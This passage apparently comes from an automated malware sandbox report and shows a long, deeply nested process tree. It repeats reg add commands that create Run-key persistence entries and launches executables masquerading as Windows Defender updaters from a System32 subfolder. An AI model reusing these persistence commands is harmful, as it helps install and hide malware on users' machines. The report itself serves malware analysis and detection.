        68⤵
        
        PID:5176
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        68⤵
        Adds Run key to start application
        
        PID:4724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        68⤵
        
        PID:5872
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        68⤵
        
        PID:5616
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        69⤵
        
        PID:4068
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        68⤵
        
        PID:5420
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        68⤵
        Checks computer location settings
        
        PID:684
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CAEC.tmp\CAED.tmp\CAEE.bat C:\Windows\system32\java.exe"
        69⤵
        
        PID:1980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        70⤵
        
        PID:5480
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        70⤵
        Delays execution with timeout.exe
        
        PID:5272
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        70⤵
        
        PID:4964
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        70⤵
        
        PID:5380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        70⤵
        
        PID:3416
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        70⤵
        Adds Run key to start application
        
        PID:3248
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        70⤵
        
        PID:2492
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        71⤵
        
        PID:5716
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        70⤵
        
        PID:5860
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        70⤵
        Checks computer location settings
        
        PID:2736
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D25E.tmp\D25F.tmp\D260.bat C:\Windows\system32\java.exe"
        71⤵
        Drops file in System32 directory
        
        PID:1536
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        72⤵
        
        PID:2968
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        72⤵
        
        PID:5884
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        72⤵
        
        PID:2256
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        72⤵
        Adds Run key to start application
        
        PID:5768
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        72⤵
        
        PID:4484
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        72⤵
        
        PID:5540
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        73⤵
        
        PID:840
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        72⤵
        
        PID:6096
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        72⤵
        Checks computer location settings
        
        PID:5516
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DA6D.tmp\DA6E.tmp\DA6F.bat C:\Windows\system32\java.exe"
        73⤵
        
        PID:3248
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        74⤵
        
        PID:3124
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        74⤵
        Adds Run key to start application
        
        PID:4860
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        74⤵
        Adds Run key to start application
        
        PID:3116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        74⤵
        
        PID:1680
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        74⤵
        
        PID:1744
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        74⤵
        
        PID:5748
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        75⤵
        
        PID:5152
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        74⤵
        
        PID:3860
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        74⤵
        Checks computer location settings
        
        PID:516
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E25C.tmp\E25D.tmp\E25E.bat C:\Windows\system32\java.exe"
        75⤵
        Drops file in System32 directory
        
        PID:64
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        76⤵
        
        PID:2492
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        76⤵
        Delays execution with timeout.exe
        
        PID:5724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        76⤵
        
        PID:4796
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        76⤵
        
        PID:5324
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        76⤵
        Adds Run key to start application
        
        PID:3508
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        76⤵
        
        PID:2684
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        76⤵
        
        PID:2968
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        77⤵
        
        PID:5424
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        76⤵
        
        PID:4556
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        76⤵
        Checks computer location settings
        
        PID:3204
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9FD.tmp\E9FE.tmp\E9FF.bat C:\Windows\system32\java.exe"
        77⤵
        Drops file in System32 directory
        
        PID:3396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        78⤵
        
        PID:4896
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        78⤵
        
        PID:5944
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        78⤵
        
        PID:5868
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        78⤵
        
        PID:5640
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        78⤵
        Adds Run key to start application
        
        PID:6044
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        78⤵
        
        PID:5840
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        78⤵
        
        PID:6032
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        79⤵
        
        PID:5740
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        78⤵
        
        PID:5064
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        78⤵
        Checks computer location settings
        
        PID:3664
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F20C.tmp\F20D.tmp\F20E.bat C:\Windows\system32\java.exe"
        79⤵
        
        PID:3544
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        80⤵
        Delays execution with timeout.exe
        
        PID:3852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        80⤵
        Adds Run key to start application
        
        PID:5568
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        80⤵
        
        PID:6060
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        80⤵
        
        PID:1276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        80⤵
        Adds Run key to start application
        
        PID:4324
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        80⤵
        
        PID:5292
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        81⤵
        
        PID:5152
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        80⤵
        
        PID:1236
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        80⤵
        Checks computer location settings
        
        PID:100
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F98E.tmp\F98F.tmp\F990.bat C:\Windows\system32\java.exe"
        81⤵
        Drops file in System32 directory
        
        PID:1320
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        82⤵
        Delays execution with timeout.exe
        
        PID:6116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        82⤵
        
        PID:1988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        82⤵
        Adds Run key to start application
        
        PID:5212
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        82⤵
        
        PID:5592
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        82⤵
        
        PID:3244
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        82⤵
        
        PID:5648
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        83⤵
        
        PID:2192
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        82⤵
        
        PID:6136
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        82⤵
        Checks computer location settings
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14E.tmp\14F.tmp\150.bat C:\Windows\system32\java.exe"
        83⤵
        
        PID:5888
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        84⤵
        
        PID:4556
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        84⤵
        
        PID:2216
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        84⤵
        
        PID:5880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        84⤵
        Adds Run key to start application
        
        PID:5868
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        84⤵
        
        PID:5640
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        84⤵
        
        PID:6044
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        84⤵
        
        PID:5840
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        85⤵
        
        PID:2564
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        84⤵
        
        PID:2208
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        84⤵
        Checks computer location settings
        
        PID:840
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\93D.tmp\93E.tmp\93F.bat C:\Windows\system32\java.exe"
        85⤵
        Drops file in System32 directory
        
        PID:4500
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        86⤵
        
        PID:436
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        86⤵
        
        PID:2688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        86⤵
        
        PID:2728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        86⤵
        
        PID:1312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        86⤵
        
        PID:4356
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        86⤵
        
        PID:5472
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        87⤵
        
        PID:1980
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        86⤵
        
        PID:1276
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        86⤵
        Checks computer location settings
        
        PID:5716
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\112D.tmp\112E.tmp\112F.bat C:\Windows\system32\java.exe"
        87⤵
        Drops file in System32 directory
        
        PID:4876
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        88⤵
        
        PID:1516
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        88⤵
        Adds Run key to start application
        
        PID:2336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        88⤵
        Adds Run key to start application
        
        PID:3988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        88⤵
        
        PID:2260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        88⤵
        
        PID:6128
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        88⤵
        
        PID:516
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        89⤵
        
        PID:2724
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        88⤵
        
        PID:4416
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        88⤵
        Checks computer location settings
        
        PID:4408
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\18ED.tmp\18EE.tmp\18EF.bat C:\Windows\system32\java.exe"
        89⤵
        Drops file in System32 directory
        
        PID:1860
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        90⤵
        Delays execution with timeout.exe
        
        PID:5336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        90⤵
        Adds Run key to start application
        
        PID:732
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        90⤵
        Adds Run key to start application
        
        PID:4964
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        90⤵
        
        PID:1368
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        90⤵
        
        PID:5916
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        90⤵
        
        PID:5684
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        91⤵
        
        PID:4616
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        90⤵
        
        PID:3396
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        90⤵
        Checks computer location settings
        
        PID:4364
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\20CD.tmp\20CE.tmp\20CF.bat C:\Windows\system32\java.exe"
        91⤵
        Drops file in System32 directory
        
        PID:3924
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        92⤵
        
        PID:3056
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        92⤵
        
        PID:5676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        92⤵
        Adds Run key to start application
        
        PID:6056
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        92⤵
        
        PID:6068
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        92⤵
        Adds Run key to start application
        
        PID:4252
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        92⤵
        
        PID:5060
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        93⤵
        
        PID:5652
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        92⤵
        
        PID:3544
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        92⤵
        Checks computer location settings
        
        PID:3664
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\287D.tmp\287E.tmp\288F.bat C:\Windows\system32\java.exe"
        93⤵
        Drops file in System32 directory
        
        PID:1540
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        94⤵
        Delays execution with timeout.exe
        
        PID:4204
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        94⤵
        
        PID:5936
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        94⤵
        
        PID:5240
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        94⤵
        Adds Run key to start application
        
        PID:3360
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        94⤵
        
        PID:5964
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        94⤵
        
        PID:5608
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        95⤵
        
        PID:4756
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        94⤵
        
        PID:5796
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        94⤵
        Checks computer location settings
        
        PID:6100
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\300F.tmp\3010.tmp\3011.bat C:\Windows\system32\java.exe"
        95⤵
        Drops file in System32 directory
        
        PID:5188
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        96⤵
        
        PID:4884
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        96⤵
        
        PID:5348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        96⤵
        
        PID:5464
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        96⤵
        
        PID:2192
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        96⤵
        
        PID:212
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        96⤵
        
        PID:4236
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        97⤵
        
        PID:5784
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        96⤵
        
        PID:5556
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        96⤵
        Checks computer location settings
        
        PID:5816
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\382D.tmp\382E.tmp\382F.bat C:\Windows\system32\java.exe"
        97⤵
        Drops file in System32 directory
        
        PID:5412
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        98⤵
        
        PID:5780
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        98⤵
        Adds Run key to start application
        
        PID:468
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        98⤵
        Adds Run key to start application
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        98⤵
        Adds Run key to start application
        
        PID:3744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        98⤵
        Adds Run key to start application
        
        PID:4540
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        98⤵
        
        PID:4088
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        99⤵
        Drops file in Drivers directory
        
        PID:4480
        
